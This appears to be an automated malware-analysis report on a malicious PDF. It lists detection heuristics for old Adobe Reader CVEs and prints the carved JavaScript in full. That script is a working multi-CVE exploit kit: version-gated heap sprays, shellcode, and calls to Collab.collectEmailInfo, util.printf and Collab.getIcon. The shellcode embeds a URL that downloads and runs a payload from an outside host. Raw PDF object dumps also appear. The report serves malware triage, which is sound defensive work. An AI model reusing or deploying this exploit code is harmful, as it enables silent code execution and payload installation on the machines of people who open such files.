MALICIOUS
612
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 14
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
app.eval(); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILEDThe cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0116_000.js |
pdf-javascript-stream | PDF /JS object 116 at offset 0x497 | 5502 bytes |
SHA-256: 5f98c6351ecd002eacfd1de60e1807061f7d566a9e0ea4f522ffd1b68a3732cb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var HgA=unescape,dXX=app.viewerVersion.toString(),pRq=HgA("t\h\i\s");pRq=eval(pRq);if(dXX<8)
{AukLz();}
if(dXX>=8&&dXX<9)
{cam();}
if(dXX<=9)
{WgPiU();}
function SuWEp(Izvxe,Thorr){while(Izvxe.length*2<Thorr){Izvxe+=Izvxe;}
return Izvxe.substring(0,Thorr/2);}
function AukLz(){var gIdTy=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0032\u0000\u0000\u0000\x40\x30\x40\x30\x40\x30\x40\x30");var yGWCg=0x0c0c0c0c;var qEmTy=[];var uDAqF=0x400000;var GfdiU=gIdTy.length*2;var Thorr=uDAqF-(GfdiU+0x38);var Izvxe=HgA("\u9090\u9090");Izvxe=SuWEp(Izvxe,Thorr);var mtWVW=(yGWCg-0x400000)/uDAqF;for(var werhr=0;werhr<mtWVW;werhr++){qEmTy[werhr]=Izvxe+gIdTy;}
var SJtFn=HgA("\u0c0c\u0c0c");while(SJtFn.length<44952)SJtFn+=SJtFn;this.collabStore=Collab.collectEmailInfo({subj:"",msg:SJtFn});}
function cam(){var VKF=new Array();function whk(kCo,zux){while(kCo.length*2<zux){kCo+=kCo;}
kCo=kCo.substring(0,zux/2);return kCo;}
sfG=0x30303030;EpS=HgA("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0031\u0000");var SSW=0x400000;var jIj=EpS.length*2;var zux=SSW-(jIj+0x38);var kCo=HgA("\u9090\u9090");kCo=whk(kCo,zux);var ija=(sfG-0x400000)/SSW;for(var UUi=0;UUi<ija;UUi++){VKF[UUi]=kCo+EpS;}
var Tes="09547910578309540547";for(HgA=0;HgA<138*2;HgA++){Tes+="2";}
util.printf("%4"+"50"+"00"+"f",Tes);}
function phR(MsZ)
{MsZ=MsZ.replace(/[\+1]/g,"0");MsZ=MsZ.replace(/[\+2]/g,"9");MsZ=MsZ.replace(/[\+3]/g,"8");MsZ=MsZ.replace(/[\+4]/g,"7");MsZ=MsZ.replace(/[\+5]/g,"6");MsZ=MsZ.replace(/[\+6]/g,"5");MsZ=MsZ.replace(/[\+7]/g,"4");MsZ=MsZ.replace(/[\+8]/g,"3");MsZ=MsZ.replace(/[\+9]/g,"2");MsZ=MsZ.replace(/[\+0]/g,"1");return MsZ;}
function WgPiU(){var CwAwQ=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0033\u0000\u3734\u3734\u3734\u3734\u3734\u3734\u3734\u3734");PMI=HgA("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+CwAwQ;gxR=HgA("\u9090\u9090");beJ=5*2;SbM=beJ+PMI.length;while(gxR.length<SbM)gxR+=gxR;jdS=gxR.substring(0,SbM);Rri=gxR.substring(0,gxR.length-SbM);while(Rri.length+SbM<0x40000)Rri=Rri+Rri+jdS;rrO=[];for(Dum=0;Dum<180;Dum++)rrO[Dum]=Rri+PMI;var ynN=4012;var gWI=Array(ynN);for(Dum=0;Dum<ynN;Dum++)
{gWI[Dum]=HgA("\u000a\u000a\u000a\u000a");}
Collab.getIcon(gWI+"_N"+".b"+"un"+"dl"+"e");}
|
|||
javascript_obj0123_002.js |
pdf-javascript-stream | PDF /JS object 123 at offset 0x36E | 5685 bytes |
SHA-256: bedcd21611958bd3bc138d9adc1b07778c9fa9d216d75339e64d2f831f43a9b3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+991>>
stream
x^�XmO 9 ��F��� !n��v��'�n;��fo/$au :
� C` � HP��>U= � �ݷ�)AS��w������8�=�y�崙 �����?��FWW[ '�u3{�������rw1�L������ ,����t8 �;� �����. ��� '۶�q�� ���
�l�̿V�� HXBx4�x ڮ��7�}�'��� ���.��Uw��Ǜf����lֻ�>��7-k뼙� �?�핌 � ?�f�,���3~ݚ/ ��4D��\ �J���2�9~��p �Rå�: .���p)���e.�'� �e �ֻ R[@*� �J�V�5�l KV�)X . ?�:#*����y"�B g)zYh�̋ |Cc����G) ?BQV�N�7��BIDT�8y JЬ` �tJå� T� �T��%o! d%��f. e�Y)O�3E�X1"��. �� �%x ���� e[+A�����[�H� E�f�V� fm(C [� ŵ ���$Q� +BcC�\L {��/�F>� ��A�u ?^��:�Z�6� �R tҹD (*4u0�V� ��H9��C�R�����D���@���_W'H^/e�Ye��� Ti�&S� �D���� ͮ0� ���H9��U*�_ A�$��( ��= , � �j2)X 'i^IS �QF >��t`i��iWkK�(�J� �.5Q� �9
�@ ���� 4.j�� �K5� ����5z�} ���� Bg��˽0�č8j���!^� � �˲v 4r� ����x���z ,`@���y����F�6 ���.E�t�"�V� u���b��^��D�ߥ�{�A '��.) 7Og� �s�M�q�����E�>� �"��_ iz� U e E^-�|5��</ �cV���`q:�o ]��� w ���
<fVs�� ������{ 0<���ټ�� b�/kX���H��o��6���l6� l�G�������r���� ��� �� N� ��@i� ��! ^�t�7?y�% \�� ^�� $W9�� T���' � |��3 ���p;J��� �
���,�Hb=��:� �1 �ʁ��NG�Cu7�1 �b"4k���%qtfI�9BN��d� �tN�t{� Ɛ�.H*Ld���kB'8��D �0 g
љ��Dt M�}Z�� k]��DF�t%� Cx E� j��`[ B��I� ��g\[I�B u� eR��t (�g 7q<a��� C� ��m,k<lSQ�_���h��|x-4Q@ l�#+� õ&�����[} W hڂ��:�V�m�I�i���9Bui �yE�BV �Y�^� ��{��ː!� >v�7�����mA>����6V �>>��@&<��T 4#�6s�&2'�Z� ��L1 �v-�v]� �yz���i ��� ��~�.r����E�� � �j�5��
��:�.�ڊ���O�)�_K�)� ���=(�1NYI�'P�}��[Y�n T�: �i� �K�u���� �+���T` ��F � o2�� CD\�2�,R?Ͳ �t �� �P�U�� [[RG����A�# �JR��߄����� Y{�O� ��Jf�θ��Gt'�K&&B����M�� �~�����k�v�*��z� �W�|ޅ�A�%��{
��� �a��:9 U]����
�� ��� �)�6 �I� }i � �)}d��o�y� e�� �i����k���eG @�3e �4"g��W ف��br�u������K��w
���;'�Mh�5ʫ���W� �� Z�5k��GGM����� � ov��ߒJ��OH K� Ҝ�� i�R��T��xBjX�?!�,UOHK��'��� �����<�뭮 �� ���?�_�p �_��_��� � L ���O)N��v c�C��>���@��g| �o^?^q��旪@{�=|Ua���Xu��E �w�P���گ@ gǻ�\�����l�H���s�i��\���f�� ~}�!�`6�;�� 5�zy�� ��Y~��C��� � }���4���E&�e��S��Z�q�]s ����- [W�� � ��5��}�X]���b��rڅe�����u ��� ��4��'<�`�x� ��L� JJ�
N��J *�,*��� ��8 ��#�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� l
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 116 at offset 0x497 | 5481 bytes |
SHA-256: 8a65b7978d26146b305c4ba79e45a78652bf8a3aa3c0827ec53c21dac1eabbc9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var HgA=unescape,dXX=app.viewerVersion.toString(),pRq=HgA("t\h\i\s");pRq=eval(pRq);if(dXX<8)
{AukLz();}
if(dXX>=8&&dXX<9)
{cam();}
if(dXX<=9)
{WgPiU();}
function SuWEp(Izvxe,Thorr){while(Izvxe.length*2<Thorr){Izvxe+=Izvxe;}
return Izvxe.substring(0,Thorr/2);}
function AukLz(){var gIdTy=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0032\u0000\u0000\u0000\x40\x30\x40\x30\x40\x30\x40\x30");var yGWCg=0x0c0c0c0c;var qEmTy=[];var uDAqF=0x400000;var GfdiU=gIdTy.length*2;var Thorr=uDAqF-(GfdiU+0x38);var Izvxe=HgA("\u9090\u9090");Izvxe=SuWEp(Izvxe,Thorr);var mtWVW=(yGWCg-0x400000)/uDAqF;for(var werhr=0;werhr<mtWVW;werhr++){qEmTy[werhr]=Izvxe+gIdTy;}
var SJtFn=HgA("\u0c0c\u0c0c");while(SJtFn.length<44952)SJtFn+=SJtFn;this.collabStore=Collab.collectEmailInfo({subj:"",msg:SJtFn});}
function cam(){var VKF=new Array();function whk(kCo,zux){while(kCo.length*2<zux){kCo+=kCo;}
kCo=kCo.substring(0,zux/2);return kCo;}
sfG=0x30303030;EpS=HgA("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0031\u0000");var SSW=0x400000;var jIj=EpS.length*2;var zux=SSW-(jIj+0x38);var kCo=HgA("\u9090\u9090");kCo=whk(kCo,zux);var ija=(sfG-0x400000)/SSW;for(var UUi=0;UUi<ija;UUi++){VKF[UUi]=kCo+EpS;}
var Tes="09547910578309540547";for(HgA=0;HgA<138*2;HgA++){Tes+="2";}
util.printf("%45000f",Tes);}
function phR(MsZ)
{MsZ=MsZ.replace(/[\+1]/g,"0");MsZ=MsZ.replace(/[\+2]/g,"9");MsZ=MsZ.replace(/[\+3]/g,"8");MsZ=MsZ.replace(/[\+4]/g,"7");MsZ=MsZ.replace(/[\+5]/g,"6");MsZ=MsZ.replace(/[\+6]/g,"5");MsZ=MsZ.replace(/[\+7]/g,"4");MsZ=MsZ.replace(/[\+8]/g,"3");MsZ=MsZ.replace(/[\+9]/g,"2");MsZ=MsZ.replace(/[\+0]/g,"1");return MsZ;}
function WgPiU(){var CwAwQ=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0033\u0000\u3734\u3734\u3734\u3734\u3734\u3734\u3734\u3734");PMI=HgA("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u